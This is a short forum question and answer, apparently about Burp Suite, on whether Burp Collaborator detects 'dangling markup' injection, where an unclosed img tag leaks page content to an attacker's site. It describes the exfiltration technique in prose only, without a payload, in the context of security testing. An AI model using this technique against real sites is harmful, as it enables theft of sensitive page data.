Does Burp Collaborator test for "dangling markup" vulnerabilities?
This article on github (https://githubengineering.com/githubs-post-csp-journey/?utm_source=webopsweekly&utm_medium=email )
outlines an attack where an attacker injects an unclosed img tag
which then includes everything until the matching quote in a request to some-evil-site, potentially sending sensitive data.
Question, does burp collaborator find issues like this?
In this situation, Burp Scanner checks for various XSS-style injection vectors, including image tags, and will report these to the user.
It doesn’t attempt to actively exploit the issue to exfiltrate data via Burp Collaborator. You could do this easily enough with the manual Burp Collaborator client and your own payloads.